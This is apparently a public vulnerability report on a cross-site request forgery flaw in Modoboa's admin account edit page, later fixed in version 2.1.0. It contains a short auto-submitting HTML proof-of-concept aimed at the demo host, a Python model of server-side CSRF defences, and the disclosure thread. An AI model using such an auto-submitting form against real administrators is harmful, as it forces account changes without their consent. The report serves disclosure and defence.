CSRF leading to edit admin accounts in modoboa/modoboa

Valid

Reported on

Feb 26th 2023


Description

The GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.

Proof of Concept

Log in as admin and try to edit an admin account (example: id=4). Then open the following file in the browser.

<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://demo.modoboa.org/admin/accounts/4/edit/">
      <input type="hidden" name="active_tab" value="default" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

An attacker could force a logged-in admin to edit and update admin accounts.
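The PoC above works because the edit page acts on a plain GET: frameworks such as Django only apply their CSRF token check to unsafe methods (POST, PUT, PATCH, DELETE), so a handler that changes state in response to GET is unprotected by design. The following is an added example, not Modoboa's code and not the fix in the referenced commit. It models the three server-side checks that stop this class of request (refuse state changes on safe methods, require a same-site Origin/Referer, and verify a per-session synchronizer token) and runs the PoC's request, a cross-site POST and a legitimate same-site POST through them. The Request class, the attacker.example host and the csrfmiddlewaretoken field name (Django's convention) are assumptions; demo.modoboa.org and the /admin/accounts/4/edit/ path come from the report.

```python
# Added example (not Modoboa's code): a minimal model of the server-side checks
# that stop the GET-based CSRF shown in the PoC. Field and header names follow
# Django conventions (assumption), since Modoboa is a Django application.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# RFC 9110 "safe" methods: a handler that changes state in response to one of
# these is outside any CSRF-token middleware, which is the root of the PoC.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}

@dataclass
class Request:
    """Constructed stand-in for a framework request object (assumption)."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)

def issue_csrf_token(session):
    """Synchronizer token: one random secret per session, echoed in each form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def source_origin_allowed(request, allowed_hosts):
    """Origin (or Referer as fallback) must name one of our own hosts.
    history.pushState() in the PoC rewrites the attacker page's path, not its
    origin, so this check still sees the attacker's host."""
    src = request.headers.get("Origin") or request.headers.get("Referer")
    if not src:
        return False
    return urlsplit(src).hostname in allowed_hosts

def authorize_account_edit(request, allowed_hosts):
    """Gate for a state-changing handler such as /admin/accounts/<id>/edit/.
    Returns (allowed, reason)."""
    if request.method in SAFE_METHODS:
        return False, "state change refused on safe method " + request.method
    if not source_origin_allowed(request, allowed_hosts):
        return False, "Origin/Referer missing or not an allowed host"
    expected = request.session.get("csrf_token", "")
    supplied = request.form.get("csrfmiddlewaretoken", "")
    # Constant-time comparison so token checking does not leak timing.
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "CSRF token missing or mismatched"
    return True, "ok"

ALLOWED_HOSTS = {"demo.modoboa.org"}          # host from the report
EDIT_PATH = "/admin/accounts/4/edit/"         # path from the report

def poc_request(session):
    """The GET the PoC page fires from the victim's browser (constructed)."""
    return Request("GET", EDIT_PATH,
                   headers={"Referer": "https://attacker.example/"},
                   form={"active_tab": "default"}, session=session)

def cross_site_post(session):
    """A cross-site POST (constructed): wrong origin and no valid token."""
    return Request("POST", EDIT_PATH,
                   headers={"Origin": "https://attacker.example"},
                   form={"active_tab": "default", "csrfmiddlewaretoken": "guess"},
                   session=session)

def legitimate_request(session):
    """Same edit submitted from the app's own form over POST (constructed)."""
    return Request("POST", EDIT_PATH,
                   headers={"Origin": "https://demo.modoboa.org"},
                   form={"active_tab": "default",
                         "csrfmiddlewaretoken": issue_csrf_token(session)},
                   session=session)

def run_demo():
    """Evaluate all three requests against the same victim session."""
    session = {}
    issue_csrf_token(session)
    return {name: authorize_account_edit(fn(session), ALLOWED_HOSTS)
            for name, fn in (("poc_get", poc_request),
                             ("cross_site_post", cross_site_post),
                             ("legitimate_post", legitimate_request))}

if __name__ == "__main__":
    for name, (ok, why) in run_demo().items():
        print(f"{name:16} {'ALLOW' if ok else 'DENY'}  {why}")
```

The first check is the one that matters for this report: once the edit handler refuses to mutate anything on GET, the PoC's form submission becomes a harmless page load, and the token and origin checks then cover the POST variants. Only the same-site POST carrying the session's own token is allowed.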

We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Antoine Nguyen validated this vulnerability a year ago
memmedrehimzade has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
memmedrehimzade
a year ago

Researcher


Can you assign a CVE please?

memmedrehimzade
a year ago

Researcher


Any update?

memmedrehimzade
a year ago

Researcher


@admin

Ben Harvie
10 months ago

Admin


The maintainer has the power to assign a CVE during the fix and publish stages.

Antoine Nguyen marked this as fixed in 2.1.0 with commit 5d886f 10 months ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has now been published 10 months ago